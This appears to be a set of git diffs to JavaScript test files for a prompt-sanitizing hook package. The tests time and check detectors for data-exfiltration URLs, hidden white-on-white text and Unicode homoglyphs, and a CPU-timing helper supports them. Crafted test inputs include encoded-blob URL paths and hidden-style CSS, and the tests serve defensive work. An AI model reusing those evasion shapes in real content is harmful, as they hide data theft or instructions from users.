+    findings.push({ index: i, char: `${CYR_A}a`, latinEquivalent: "b" });
+  }
+  return { text, findings };
+}
+
+/**
+ * The non-vacuity control for the harness itself: the very pattern this gate was
+ * written after, kept here as a specimen. Unanchored with two `.*` lookaheads,
+ * so a value carrying neither class costs a full scan at every start offset —
+ * quadratic, with no backtracking for a pattern analyzer to find. If this does
+ * not read as super-linear, neither would a real regression, and every case
+ * above is passing for the wrong reason.
+ */
+const QUADRATIC_SPECIMEN_RE = /(?=.*[A-Z])(?=.*[0-9])/;
+
+/**
+ * The cases. `run` takes an input built by `input(size, attempt)`; `attempt`
+ * varies the input by one unit per call so a memo cannot answer for the work
+ * (see `measure`). `marker` runs once at a small size and must return true —
+ * it is the proof that the input reaches the code the case is about, so a
+ * refactor that stops routing this shape through that path fails loudly instead
+ * of timing a cheap rejection.
+ * @type {Record<string, { input: (size: number, attempt: number) => unknown,
+ *   run: (input: any) => unknown, marker: () => boolean }>}
+ */
+const CASES = {
+  "checkExfilUrl/lowercase-blob-path": {
+    input: (size, attempt) => lowercaseBlobPath(size - attempt),
+    run: (url) => checkExfilUrl(url),
+    // Checked at the size the timing is taken at, not at a comfortable one: the
+    // whole reason the query route is absent here is that a length gate answers
+    // it before the detector runs, and a marker read on a short input would not
+    // have seen that. The mixed twin is reported as a blob, so a segment of this
+    // length does reach the mix test — where the lowercase twin, correctly,
+    // comes back benign.
+    marker: () =>
+      checkExfilUrl(mixedBlobPath(LARGE)) ===
+        "encoded data blob in path segment" &&
+      checkExfilUrl(lowercaseBlobPath(LARGE)) === null,
+  },
+  "sanitizeHtml/open-angle-prose": {
+    input: (size, attempt) => openAngleProse(size - attempt),
+    run: (text) => sanitizeHtml(text),
+    // A document with no HTML tag is answered with null before any analysis
+    // runs, so the `<p>` this shape carries is load-bearing.
+    marker: () => sanitizeHtml(openAngleProse(512)) !== null,
+  },
+  "isHiddenStyle/digit-channel": {
+    input: (size, attempt) => digitChannel(size - attempt),
+    run: (style) => isHiddenStyle(style),
+    // White on white is the verdict the channel parser exists to reach, so a
+    // true here proves the tokens are being resolved rather than declined.
+    marker: () =>
+      isHiddenStyle("color: rgb(255, 255, 255); background: rgb(255,255,255)"),
+  },
+  "foldConfusables/overlapping-findings": {
+    input: (size, attempt) => overlappingFolds(size - attempt),
+    run: ({ text, findings }) => foldConfusables(text, findings),
+    // A fold that changed nothing would time an empty loop, and a fold that
+    // never took the overlap branch would time the ordinary one: "b" is the
+    // replacement only the overlapping finding can produce.
+    marker: () => {
+      const { text, findings } = overlappingFolds(64);
+      return foldConfusables(text, findings) === "b".repeat(32);
+    },
+  },
+  "control/quadratic-specimen": {
+    input: (size, attempt) => grow("abcdefg-", size - attempt),
+    run: (text) => QUADRATIC_SPECIMEN_RE.test(text),
+    // The specimen answers the question it is asked, so what it measures is the
+    // cost of reaching that answer rather than an early bail.
+    marker: () =>
+      QUADRATIC_SPECIMEN_RE.test("aB3") && !QUADRATIC_SPECIMEN_RE.test("abc"),
+  },
+};
+
+/** The name of the case that must FAIL the growth limit; every other case must
+ * pass it. Kept as a name rather than a flag so the two assertions below read
+ * from one declaration. */
+const CONTROL = "control/quadratic-specimen";
+
+/**
+ * The specimen runs at a quarter of the size the real cases do: 64 KB of a
+ * quadratic scan is nearly two seconds per call, and it is measured nine times.
+ * The ratio is what the gate reads and it is scale-free, so a smaller pair says
+ * exactly as much — but only while both sides stay clear of timer noise, which
+ * is the floor a quarter buys and a sixty-fourth (128 bytes) does not.
+ */
+const CONTROL_SCALE = 1 / 4;
+
+/** @type {Record<string, {small: number, large: number, growth: number}>} */
+const timing = {};
+
+before(
+  async () => {
+    if (MUTATION_RUN) return;
+    const resolution = clockResolutionMs();
+    assert.ok(
+      resolution <= RESOLUTION_CEILING_MS,
+      `process.cpuUsage resolves no finer than ${resolution.toFixed(3)}ms on this kernel, so these blocks are quantized to within their own size`,
+    );
+    for (const [name, { input, run }] of Object.entries(CASES)) {
+      const scale = name === CONTROL ? CONTROL_SCALE : 1;
+      const large = await measure(
+        (attempt) => /** @type {any} */ (input(LARGE * scale, attempt)),
+        (built) => run(built),
+      );
+      const small = await measurePerCall(
+        (attempt) => /** @type {any} */ (input(SMALL * scale, attempt)),
+        (built) => run(built),
+        large.cpu,
+      );
+      timing[name] = { small, large: large.cpu, growth: large.cpu / small };
+    }
+  },
+  // A quadratic path does not merely exceed the limit, it takes minutes to
+  // measure — so an unbounded hook would hang rather than report. This is the
+  // ceiling for the whole measured set; a green run is an order of magnitude
+  // under it.
+  { timeout: 300_000 },
+);
+
+/** An `it` whose verdict rests on the timings, and so has none under Stryker.
+ * @param {string} name
+ * @param {(t: import("node:test").TestContext) => void} fn */
+const timed = (name, fn) =>
+  it(name, (t) => {
+    if (MUTATION_RUN) {
+      t.skip(MUTATION_RUN);
+      return;
+    }
+    fn(t);
+  });
+
+describe("algorithmic complexity", () => {
+  for (const [name, { marker }] of Object.entries(CASES))
+    it(`${name}: the input reaches the path this case is about`, () => {
+      assert.ok(
+        marker(),
+        `${name} no longer drives the code it was written for, so its timing means nothing`,
+      );
+    });
+
+  for (const name of Object.keys(CASES).filter((c) => c !== CONTROL))
+    timed(`${name}: cost grows with the input, not with its square`, (t) => {
+      const { small, large, growth } = timing[name];
+      // Emitted on the green path too: this table is the only place a machine
+      // these ratios have never been read on reports its own numbers.
+      t.diagnostic(
+        `${name}: ${growth.toFixed(1)}x for ${LARGE / SMALL}x the input (${small.toFixed(3)}ms -> ${large.toFixed(3)}ms CPU)`,
+      );
+      assert.ok(
+        growth <= GROWTH_LIMIT,
+        `${name} cost ${growth.toFixed(1)}x for ${LARGE / SMALL}x the input, limit ${GROWTH_LIMIT}x`,
+      );
+    });
+
+  timed("the gate can see a quadratic at all", (t) => {
+    // Without this the whole file passes on a machine, a Node version, or a
+    // measurement bug that flattens every ratio to noise.
+    const { growth } = timing[CONTROL];
+    t.diagnostic(`${CONTROL}: ${growth.toFixed(1)}x`);
+    assert.ok(
+      growth > GROWTH_LIMIT,
+      `the deliberately quadratic control grew only ${growth.toFixed(1)}x for ${LARGE / SMALL}x the input — this harness cannot currently detect a quadratic, so every other case here is passing for the wrong reason`,
+    );
+  });
+});

--- a/test/algorithmic-complexity.test.mjs
+++ b/test/algorithmic-complexity.test.mjs
@@ -80,22 +80,17 @@ const lowercaseBlobPath = (n) => `https://e.com/${grow("abcdefg-", n)}`;
 const mixedBlobPath = (n) => `https://e.com/${grow("aB3defg-", n)}`;
 
 /**
- * Many tag openers, then one `>`, then a hidden span, all in one paragraph.
- * Every part is load-bearing, and getting any of them wrong makes the case
- * measure nothing:
+ * Many tag openers, then one `>`, then a hidden span. Two parts are
+ * load-bearing, and getting either wrong makes the case measure nothing:
  *
- * - the opener is `<` plus a name letter, or the tail test declines it in
- *   constant time (`<` plus a space is the trap: it looks adversarial and is
- *   answered instantly);
- * - the `!` keeps each opener from being a well-formed tag, which is what leaves
- *   the whole run inside ONE inter-node raw slice — with `<ab ` openers the
- *   final `<ab >` parses as an html node of its own and the slice handed to the
- *   fold ends before the `>`, where the tail test answers in constant time;
+ * - the `!` keeps each opener from being a well-formed tag, which is what
+ *   leaves the whole run inside ONE inter-node raw slice reaching past the `>`.
+ *   With `<ab ` openers the final `<ab >` parses as an html node of its own,
+ *   the slice ends before the `>`, and a rescan from every `<` has nothing to
+ *   rescan to;
  * - the span is a real inline-html child, and the openers are the raw source
  *   BETWEEN nodes, which is the slice the absorb state is folded over. Without
- *   a child the document has no inline html and the fold never runs;
- * - the paragraph opens with prose, or the run is block-level html and the
- *   inline walk that folds the absorb state is never entered.
+ *   a child the document has no inline html and the fold never runs.
  * @param {number} n
  * @returns {string}
  */

--- a/test/confusables-property.test.mjs
+++ b/test/confusables-property.test.mjs
@@ -13,6 +13,7 @@ import fc from "fast-check";
 
 import {
   foldConfusables,
+  hasNonAscii,
   normalizeConfusables,
   selectFoldableFindings,
 } from "../src/confusables.mjs";
@@ -231,6 +232,138 @@ describe("foldConfusables (property)", () => {
         /does not match input at index/,
       );
     });
+  });
+
+  // Reference fold for arbitrary (possibly overlapping) findings: splice the
+  // whole string, highest index first. Its guard reads the PARTIALLY FOLDED
+  // string, which is what the real function validates an overlapping finding
+  // against, so the two agree on which findings are rejected as well as on the
+  // output — letting a generator emit invalid findings and compare outcomes.
+  const naiveFold = (t, findings) => {
+    let out = t;
+    for (const finding of [...findings].sort(
+      (lhs, rhs) => rhs.index - lhs.index,
+    )) {
+      if (!out.startsWith(finding.char, finding.index))
+        throw new Error(`does not match input at index ${finding.index}`);
+      out =
+        out.slice(0, finding.index) +
+        finding.latinEquivalent +
+        out.slice(finding.index + finding.char.length);
+    }
+    return out;
+  };
+
+  // A differential test compares OUTCOMES, so both calls are wrapped; the error
+  // is re-asserted by its message at the call site rather than swallowed.
+  const attempt = (fn) => {
+    try {
+      return { value: fn() };
+    } catch (error) {
+      return { error };
+    }
+  };
+
+  const rawFinding = fc.record({
+    start: fc.nat({ max: 63 }), // code-point position, taken modulo the text
+    // Bias half the findings to the highest offset still available: a uniformly
+    // placed one almost never reaches past the previous fold, so overlaps —
+    // the case under test — would be a rounding error in the generated corpus.
+    abutting: fc.boolean(),
+    glyphs: fc.integer({ min: 1, max: 2 }),
+    latinEquivalent: fc.string({
+      unit: fc.constantFrom("a", "b", "z", "/", "1"),
+      minLength: 1,
+      maxLength: 3,
+    }),
+  });
+
+  /** UTF-16 offset of each code-point boundary of `t`, plus its length. */
+  const boundaries = (t) => {
+    const offsets = [0];
+    for (const point of t)
+      offsets.push(offsets[offsets.length - 1] + point.length);
+    return offsets;
+  };
+
+  it("equals a naive whole-string splice on VALID overlapping findings", () => {
+    check(
+      fc.tuple(text, fc.array(rawFinding, { maxLength: 5 })),
+      ([t, raws]) => {
+        // Each `char` is read from the text as the folds applied so far have left
+        // it, which is the state the real function validates against — so every
+        // finding is valid when applied and the comparison is on OUTPUT, not on
+        // who rejects what. Reading from the original text instead would make
+        // essentially every overlap a mismatch and never exercise the fold.
+        let folded = t;
+        let cursor = t.length;
+        const findings = [];
+        for (const raw of raws) {
+          const points = [...folded];
+          const offsets = boundaries(folded);
+          const starts = points
+            .map((_, i) => i)
+            .filter((i) => offsets[i] < cursor);
+          if (starts.length === 0) break;
+          const at = raw.abutting
+            ? starts[starts.length - 1]
+            : starts[raw.start % starts.length];
+          const char = points.slice(at, at + raw.glyphs).join("");
+          // An ASCII-only `char` is refused by a finding-shape guard the naive
+          // splice does not model, so it is out of this property's scope.
+          if (!hasNonAscii(char)) continue;
+          const index = offsets[at];
+          findings.push({ index, char, latinEquivalent: raw.latinEquivalent });
+          folded =
+            folded.slice(0, index) +
+            raw.latinEquivalent +
+            folded.slice(index + char.length);
+          cursor = index;
+        }
+        assert.equal(
+          foldConfusables(t, findings),
+          naiveFold(t, findings),
+          `text=${JSON.stringify(t)} findings=${JSON.stringify(findings)}`,
+        );
+      },
+    );
+  });
+
+  it("rejects an invalid overlapping finding exactly when the reference does", () => {
+    check(
+      fc.tuple(text, fc.array(rawFinding, { maxLength: 5 })),
+      ([t, raws]) => {
+        // Chars read from the ORIGINAL text: a finding overlapping an applied fold
+        // then names bytes the fold rewrote, so both sides must reject it.
+        const points = [...t];
+        if (points.length === 0) return;
+        const offsets = boundaries(t);
+        const findings = [];
+        for (const raw of raws) {
+          const at = raw.start % points.length;
+          const char = points.slice(at, at + raw.glyphs).join("");
+          if (!hasNonAscii(char)) continue;
+          findings.push({
+            index: offsets[at],
+            char,
+            latinEquivalent: raw.latinEquivalent,
+          });
+        }
+        const actual = attempt(() => foldConfusables(t, findings));
+        const reference = attempt(() => naiveFold(t, findings));
+        const context = `text=${JSON.stringify(t)} findings=${JSON.stringify(findings)}`;
+        assert.equal(
+          actual.error === undefined,
+          reference.error === undefined,
+          `outcome differs from the naive reference: ${context} actual=${actual.error?.message ?? JSON.stringify(actual.value)} reference=${reference.error?.message ?? JSON.stringify(reference.value)}`,
+        );
+        if (actual.error !== undefined) {
+          assert.match(actual.error.message, /does not match input at index/);
+          return;
+        }
+        assert.equal(actual.value, reference.value, context);
+      },
+    );
   });
 });
 

--- a/test/confusables.test.mjs
+++ b/test/confusables.test.mjs
@@ -152,14 +152,25 @@ describe("foldConfusables", () => {
   });
 
   it("throws on a negative index instead of silently corrupting the text", () => {
-    // startsWith(char, -1) clamps to 0 and returns true when `char` is a prefix,
-    // so without the explicit range check this would splice to "abxabc".
     assert.throws(
       () =>
         foldConfusables("abc", [
           { index: -1, char: "a", latinEquivalent: "x" },
         ]),
       /out-of-range index -1/,
+    );
+  });
+
+  it("throws on a negative index whose bytes DO match, read from the end", () => {
+    // The byte check alone passes here: `slice(-2)` reads "аb" from the end, so
+    // `char` matches bytes the finding never named, and the splice would fold
+    // them to "axb". Only the range check refuses it.
+    assert.throws(
+      () =>
+        foldConfusables(`a${CYR_A}b`, [
+          { index: -2, char: CYR_A, latinEquivalent: "x" },
+        ]),
+      /out-of-range index -2/,
     );
   });
 
@@ -544,6 +555,30 @@ describe("selectFoldableFindings", () => {
       latinEquivalent: "ao",
     };
     assert.deepEqual(selectFoldableFindings(text, [finding]), [finding]);
+  });
+
+  it("rejects a finding whose ASTRAL char spans into a token the gate refused", () => {
+    // `foldableAt` is indexed in UTF-16 units, so a per-code-point walk checks
+    // two offsets for a four-unit `char` and never looks at the ones past it.
+    // Here the tail reaches the lone Cyrillic token, which the gate rejects —
+    // folding it would rewrite exactly the text the gate exists to protect.
+    const bold = (n) => cp(0x1d400 + n);
+    const text = `a${bold(0)}${bold(1)} ${CYR_O}`;
+    const mapped = [
+      { index: 1, char: bold(0), latinEquivalent: "A" },
+      { index: 3, char: bold(1), latinEquivalent: "B" },
+    ];
+    assert.deepEqual(
+      selectFoldableFindings(text, [
+        ...mapped,
+        {
+          index: 1,
+          char: `${bold(0)}${bold(1)} ${CYR_O}`,
+          latinEquivalent: "x",
+        },
+      ]),
+      mapped,
+    );
   });
 });
 

--- a/test/confusables.test.mjs
+++ b/test/confusables.test.mjs
@@ -235,6 +235,88 @@ describe("foldConfusables", () => {
       "1/2 x",
     );
   });
+
+  // OVERLAPPING findings. Highest-index-first means the lower finding is
+  // validated against — and consumes — bytes an earlier fold already rewrote,
+  // so its `char` names the ALREADY-FOLDED text, not the input. makeScan never
+  // emits such a finding; a buggy or adversarial engine can, and the fold must
+  // stay byte-exact rather than corrupt the command.
+  const CYR_E = cp(0x0435);
+  const MATH_A = cp(0x1d400);
+  const MATH_B = cp(0x1d401);
+  for (const [name, text, findings, expected] of [
+    [
+      "folds an overlap of one UTF-16 unit into already-folded bytes",
+      `/${CYR_A}${CYR_O}/b`,
+      [
+        { index: 2, char: CYR_O, latinEquivalent: "o" },
+        { index: 1, char: `${CYR_A}o`, latinEquivalent: "AO" },
+      ],
+      "/AO/b",
+    ],
+    [
+      "folds an overlap that crosses a surrogate pair (astral confusables)",
+      `${MATH_A}${MATH_B}`,
+      [
+        { index: 2, char: MATH_B, latinEquivalent: "b" },
+        { index: 0, char: `${MATH_A}b`, latinEquivalent: "AB" },
+      ],
+      "AB",
+    ],
+    [
+      "folds a chain of three mutually overlapping findings",
+      `${CYR_A}${CYR_O}${CYR_E}`,
+      [
+        { index: 2, char: CYR_E, latinEquivalent: "e" },
+        { index: 1, char: `${CYR_O}e`, latinEquivalent: "OE" },
+        { index: 0, char: `${CYR_A}O`, latinEquivalent: "X" },
+      ],
+      "XE",
+    ],
+    [
+      "consumes only part of a one-to-many canon the overlap reaches into",
+      `${CYR_A}½`,
+      [
+        { index: 1, char: "½", latinEquivalent: "1/2" },
+        { index: 0, char: `${CYR_A}1`, latinEquivalent: "Z" },
+      ],
+      "Z/2",
+    ],
+  ]) {
+    it(name, () => assert.equal(foldConfusables(text, findings), expected));
+  }
+
+  for (const [name, text, findings] of [
+    [
+      "an overlapping finding whose char misses the folded bytes",
+      `/${CYR_A}${CYR_O}`,
+      [
+        { index: 2, char: CYR_O, latinEquivalent: "o" },
+        { index: 1, char: `${CYR_A}z`, latinEquivalent: "Q" },
+      ],
+    ],
+    [
+      "a finding claiming bytes past the end of the input",
+      `/${CYR_A}`,
+      [{ index: 1, char: `${CYR_A}bc`, latinEquivalent: "Q" }],
+    ],
+    [
+      "a finding claiming bytes past the end of the folded text",
+      `/${CYR_A}${CYR_O}`,
+      [
+        { index: 2, char: CYR_O, latinEquivalent: "o" },
+        { index: 1, char: `${CYR_A}oXY`, latinEquivalent: "Q" },
+      ],
+    ],
+  ]) {
+    // The mismatch must surface as the named finding error, not as an internal
+    // one from reading past the end of the assembled output.
+    it(`throws on ${name}`, () =>
+      assert.throws(
+        () => foldConfusables(text, findings),
+        /does not match input at index 1/,
+      ));
+  }
 });
 
 // ─── normalizeConfusables: folding positive cases ────────────────────────────

--- a/test/helpers/cpu-timing.mjs
+++ b/test/helpers/cpu-timing.mjs
@@ -13,6 +13,7 @@
  * and `test/algorithmic-complexity.test.mjs` (growth against input length).
  */
 import assert from "node:assert/strict";
+import { it } from "node:test";
 
 /**
  * Why a cost gate cannot be read under Stryker.
@@ -49,7 +50,7 @@ export const grow = (unit, n) =>
  * the dearest cells read up to 1.7x their own median, at eight up to 1.1x, which
  * is what lets the budgets stay tight enough to catch a doubling.
  */
-export const SAMPLES = 8;
+const SAMPLES = 8;
 
 /**
  * A timed block, in ms: the CPU time the process spent, and the wall clock it
@@ -62,7 +63,7 @@ export const SAMPLES = 8;
  * is charged to it — which is the intent, since the hook pays for those too.
  * @param {ReturnType<typeof process.cpuUsage>} mark
  * @returns {number} */
-export const cpuSince = (mark) => {
+const cpuSince = (mark) => {
   const spent = process.cpuUsage(mark);
   return (spent.user + spent.system) / 1000;
 };
@@ -81,8 +82,9 @@ export const cpuSince = (mark) => {
  * reuse — 81 ms for a 256 KB fragment against the 160 ms a hook pays for a
  * document it is seeing for the first time, which is the only case there is.
  * The inputs differ in length by one code point, so the shape is unchanged.
- * @param {(attempt: number) => string} input
- * @param {(text: string) => unknown | Promise<unknown>} fn
+ * @template T
+ * @param {(attempt: number) => T} input
+ * @param {(built: T) => unknown | Promise<unknown>} fn
  * @returns {Promise<Timing>}
  */
 export async function measure(input, fn) {
@@ -121,8 +123,9 @@ const BLOCK_RING = 8;
  * fastest-of-N is fair only between blocks of similar length (see
  * {@link measure}). Under {@link MIN_BLOCK_MS} the floor wins and the bias runs
  * the other way.
- * @param {(attempt: number) => string} input
- * @param {(text: string) => unknown | Promise<unknown>} fn
+ * @template T
+ * @param {(attempt: number) => T} input
+ * @param {(built: T) => unknown | Promise<unknown>} fn
  * @param {number} blockMs
  * @returns {Promise<number>}
  */
@@ -143,7 +146,7 @@ export async function measurePerCall(input, fn, blockMs) {
   for (let i = 0; i < Math.min(repeats, BLOCK_RING); i++)
     ring.push(input(SAMPLES + 1 + i));
   const block = await measure(
-    () => "",
+    () => /** @type {T} */ (/** @type {unknown} */ (undefined)),
     async () => {
       for (let i = 0; i < repeats; i++) await fn(ring[i % ring.length]);
     },
@@ -183,3 +186,18 @@ export function clockResolutionMs() {
  * cannot resolve a calibration pass, and {@link measurePerCall} would divide a
  * matched block by a zero. */
 export const RESOLUTION_CEILING_MS = 0.5;
+
+/**
+ * An `it` whose verdict rests on a timing, and so has none under a mutation run.
+ * @param {string} name
+ * @param {(t: import("node:test").TestContext) => void | Promise<void>} fn
+ * @returns {void}
+ */
+export const timed = (name, fn) =>
+  it(name, async (t) => {
+    if (MUTATION_RUN) {
+      t.skip(MUTATION_RUN);
+      return;
+    }
+    await fn(t);
+  });

--- a/test/helpers/cpu-timing.mjs
+++ b/test/helpers/cpu-timing.mjs
@@ -1,0 +1,185 @@
+/**
+ * CPU-time measurement for the gates that read cost rather than correctness.
+ *
+ * Every such gate is a RATIO — a cost against a calibration, or a cost at one
+ * input size against the same cost at another — because machine speed and the
+ * coverage instrumentation scale both sides, so a ratio survives a slow or
+ * instrumented runner in a way milliseconds do not. A ratio does not cancel a
+ * BUSY machine, though, so a timed block is charged in CPU time rather than wall
+ * clock: time descheduled behind another test worker is not time the code spent,
+ * and the CPU clock does not charge it.
+ *
+ * Shared by `test/hook-latency.test.mjs` (budgets against a calibration pass)
+ * and `test/algorithmic-complexity.test.mjs` (growth against input length).
+ */
+import assert from "node:assert/strict";
+
+/**
+ * Why a cost gate cannot be read under Stryker.
+ *
+ * A mutation run rewrites every source file so each expression sits behind a
+ * per-mutant branch, and it runs four workers at once — the code under test
+ * slows several-fold while a test file's own calibration, which Stryker does not
+ * instrument, does not. The cheapest budget goes red first, and Stryker aborts
+ * every shard whose initial dry run is red. A gate reading this says so and
+ * stands down rather than reporting a regression it cannot see.
+ *
+ * `STRYKER_NAMESPACE` is set on every test process the tap runner spawns (see
+ * `@stryker-mutator/tap-runner`'s `runFile`), in both the dry run and the mutant
+ * runs; nothing else in this repo sets it.
+ */
+export const MUTATION_RUN = process.env.STRYKER_NAMESPACE
+  ? "Stryker instruments the code under test but not this file's timing, so the ratios measure the instrumentation"
+  : null;
+
+/** `unit` repeated to exactly `n` UTF-16 units. */
+export const grow = (unit, n) =>
+  unit.repeat(Math.ceil(n / unit.length)).slice(0, n);
+
+/**
+ * The FASTEST of {@link SAMPLES} timed runs after a warm-up call.
+ *
+ * Collector pauses, and the descheduling the CPU clock still sees, only ever ADD
+ * time, so the minimum is the closest any of the samples got to the cost of the
+ * code itself. A median still carries whatever noise landed on the middle
+ * sample, which on a shared runner is most of them. The estimator loses nothing
+ * the gates are for: a path that got an order of magnitude slower is an order of
+ * magnitude slower in its fastest run too. Eight rather than four because four
+ * tries are not enough on a loaded runner for the collector to miss one: at four
+ * the dearest cells read up to 1.7x their own median, at eight up to 1.1x, which
+ * is what lets the budgets stay tight enough to catch a doubling.
+ */
+export const SAMPLES = 8;
+
+/**
+ * A timed block, in ms: the CPU time the process spent, and the wall clock it
+ * occupied.
+ * @typedef {{cpu: number, wall: number}} Timing
+ */
+
+/** The CPU time a block charged the process, in ms. `process.cpuUsage` counts
+ * every thread, so a collector pass or a background compile the block provoked
+ * is charged to it — which is the intent, since the hook pays for those too.
+ * @param {ReturnType<typeof process.cpuUsage>} mark
+ * @returns {number} */
+export const cpuSince = (mark) => {
+  const spent = process.cpuUsage(mark);
+  return (spent.user + spent.system) / 1000;
+};
+
+/**
+ * A block's cost, in both clocks. `cpu` is what a ratio reads: a ratio cancels a
+ * slower machine because both sides run at that speed, but not a busy one,
+ * because the two sides are timed over blocks of very different length — a 1 ms
+ * calibration pass reliably catches a quiet slot for its fastest sample and a
+ * 250 ms parse5 run never does, so the divisor stays flat while the numerator
+ * inflates.
+ *
+ * Each call gets its own document from `input(attempt)`. Handing every call the
+ * same string measures a memo hit rather than the work: the HTML layer
+ * remembers its last parse, so the warm-up builds the tree the timed runs then
+ * reuse — 81 ms for a 256 KB fragment against the 160 ms a hook pays for a
+ * document it is seeing for the first time, which is the only case there is.
+ * The inputs differ in length by one code point, so the shape is unchanged.
+ * @param {(attempt: number) => string} input
+ * @param {(text: string) => unknown | Promise<unknown>} fn
+ * @returns {Promise<Timing>}
+ */
+export async function measure(input, fn) {
+  await fn(input(0));
+  const best = { cpu: Infinity, wall: Infinity };
+  for (let i = 1; i <= SAMPLES; i++) {
+    const text = input(i);
+    const mark = process.cpuUsage();
+    const started = performance.now();
+    await fn(text);
+    // Each estimator takes its own minimum: the quietest sample by wall clock
+    // need not be the cheapest by CPU, and taking the pair from one sample would
+    // charge the CPU figure for whatever made that sample the quietest.
+    best.wall = Math.min(best.wall, performance.now() - started);
+    best.cpu = Math.min(best.cpu, cpuSince(mark));
+  }
+  return best;
+}
+
+/** A timed block has to last at least this long to be a measurement rather than
+ * timer noise, however cheap the call it is made of. */
+const MIN_BLOCK_MS = 5;
+/** How many distinct documents a timed block cycles through. */
+const BLOCK_RING = 8;
+
+/**
+ * The per-call CPU cost of `fn`, timed over as many calls as it takes to fill a
+ * block of `blockMs`.
+ *
+ * One 32 KB pass costs a fraction of a millisecond on a fast machine, and that
+ * is the number a scaling gate divides by. Timing a batch and dividing keeps
+ * the small end meaningful at any machine speed.
+ *
+ * `blockMs` is what makes the two sides of a scaling ratio comparable: the
+ * caller passes the cost of the side it will be divided into, since
+ * fastest-of-N is fair only between blocks of similar length (see
+ * {@link measure}). Under {@link MIN_BLOCK_MS} the floor wins and the bias runs
+ * the other way.
+ * @param {(attempt: number) => string} input
+ * @param {(text: string) => unknown | Promise<unknown>} fn
+ * @param {number} blockMs
+ * @returns {Promise<number>}
+ */
+export async function measurePerCall(input, fn, blockMs) {
+  const single = (await measure(input, fn)).cpu;
+  // A zero would divide into a repeat count no loop finishes. The resolution
+  // probe callers run first is what normally catches a clock too coarse to
+  // measure these calls; this refuses to hang if one gets past it.
+  assert.ok(single > 0, "the CPU clock reported no time for a timed call");
+  const repeats = Math.ceil(Math.max(MIN_BLOCK_MS, blockMs) / single);
+  if (repeats <= 1) return single;
+  // The block cycles a ring of distinct documents for the same reason `measure`
+  // varies its input, and a ring rather than one document per call because
+  // `repeats` runs to the hundreds on a fast machine and each document is a
+  // whole input. Consecutive calls always differ, which is what a one-entry
+  // parse memo needs to miss.
+  const ring = [];
+  for (let i = 0; i < Math.min(repeats, BLOCK_RING); i++)
+    ring.push(input(SAMPLES + 1 + i));
+  const block = await measure(
+    () => "",
+    async () => {
+      for (let i = 0; i < repeats; i++) await fn(ring[i % ring.length]);
+    },
+  );
+  return block.cpu / repeats;
+}
+
+/** How long a probe block busy-waits, and how many it runs. */
+const PROBE_MS = 0.2;
+const PROBE_BLOCKS = 40;
+
+/**
+ * The finest CPU-time reading this clock resolves, in ms.
+ *
+ * `process.cpuUsage` reports microseconds, but a kernel that accumulates rusage
+ * at tick granularity only ever reports whole ticks — 1 ms, or 4 ms — and a
+ * calibration pass costs about one millisecond, so on such a kernel the unit is
+ * quantized to within its own size and no ratio means anything. Busy-wait blocks
+ * well under a tick and keep the smallest non-zero reading: it comes back near
+ * {@link PROBE_MS} on a microsecond clock and at a whole tick otherwise.
+ * @returns {number}
+ */
+export function clockResolutionMs() {
+  let finest = Infinity;
+  for (let i = 0; i < PROBE_BLOCKS; i++) {
+    const mark = process.cpuUsage();
+    const until = performance.now() + PROBE_MS;
+    let spin = 0;
+    while (performance.now() < until) spin += Math.sqrt(spin + 1);
+    const spent = cpuSince(mark);
+    if (spent > 0 && spent < finest) finest = spent;
+  }
+  return finest;
+}
+
+/** The coarsest clock a cost gate can be read on. A reading no finer than this
+ * cannot resolve a calibration pass, and {@link measurePerCall} would divide a
+ * matched block by a zero. */
+export const RESOLUTION_CEILING_MS = 0.5;

--- a/test/hook-latency.test.mjs
+++ b/test/hook-latency.test.mjs
@@ -37,6 +37,8 @@ import {
   timed,
 } from "./helpers/cpu-timing.mjs";
 
+/** @typedef {import("./helpers/cpu-timing.mjs").Timing} Timing */
+
 const { claudeAdapter } = await import("agent-control-plane-core/claude");
 const { judgeSanitizeUserPrompt } =
   await import("../claude-hooks/sanitize-user-prompt.mjs");

--- a/test/hook-latency.test.mjs
+++ b/test/hook-latency.test.mjs
@@ -15,8 +15,8 @@
  * milliseconds do not — the calibration lives in this file, rather than reaching
  * for a native builtin, so it pays the same instrumentation tax as the code it
  * normalizes. A ratio does not cancel a BUSY machine, though, so every timed
- * block is charged in CPU time rather than wall clock (see {@link measure}).
- * {@link REALISTIC_MS} is the lone exception.
+ * block is charged in CPU time rather than wall clock (see `measure` in
+ * {@link ./helpers/cpu-timing.mjs}). {@link REALISTIC_MS} is the lone exception.
  */
 import { describe, it, before } from "node:test";
 import assert from "node:assert/strict";
@@ -27,149 +27,23 @@ import {
   foldConfusables,
   selectFoldableFindings,
 } from "../src/confusables.mjs";
+import {
+  MUTATION_RUN,
+  RESOLUTION_CEILING_MS,
+  clockResolutionMs,
+  grow,
+  measure,
+  measurePerCall,
+} from "./helpers/cpu-timing.mjs";
 
 const { claudeAdapter } = await import("agent-control-plane-core/claude");
 const { judgeSanitizeUserPrompt } =
   await import("../claude-hooks/sanitize-user-prompt.mjs");
 
-/**
- * Why the ratios cannot be read under Stryker.
- *
- * A mutation run rewrites every source file so each expression sits behind a
- * per-mutant branch, and it runs four workers at once — the code under test
- * slows several-fold while this file's calibration, which Stryker does not
- * instrument, does not. The cheap-input budget is the tightest here, so it goes
- * red first, and Stryker aborts every shard whose initial dry run is red. The
- * gate says so and stands down rather than reporting a regression it cannot see.
- *
- * `STRYKER_NAMESPACE` is set on every test process the tap runner spawns (see
- * `@stryker-mutator/tap-runner`'s `runFile`), in both the dry run and the mutant
- * runs; nothing else in this repo sets it.
- */
-const MUTATION_RUN = process.env.STRYKER_NAMESPACE
-  ? "Stryker instruments the code under test but not this file's calibration, so the ratios measure the instrumentation"
-  : null;
-
 const KB = 1024;
 const SMALL = 32 * KB;
 const LARGE = 256 * KB;
 const cp = (n) => String.fromCodePoint(n);
-const grow = (unit, n) => unit.repeat(Math.ceil(n / unit.length)).slice(0, n);
-
-/**
- * The FASTEST of {@link SAMPLES} timed runs after a warm-up call.
- *
- * Collector pauses, and the descheduling the CPU clock still sees, only ever ADD
- * time, so the minimum is the closest any of the samples got to the cost of the
- * code itself. A median still carries whatever noise landed on the middle
- * sample, which on a shared runner is most of them. The estimator loses nothing
- * the gates are for: a path that got an order of magnitude slower is an order of
- * magnitude slower in its fastest run too. Eight rather than four because four
- * tries are not enough on a loaded runner for the collector to miss one: at four
- * the dearest cells read up to 1.7x their own median, at eight up to 1.1x, which
- * is what lets the budgets below stay tight enough to catch a doubling.
- */
-const SAMPLES = 8;
-
-/**
- * A timed block, in ms: the CPU time the process spent, and the wall clock it
- * occupied.
- * @typedef {{cpu: number, wall: number}} Timing
- */
-
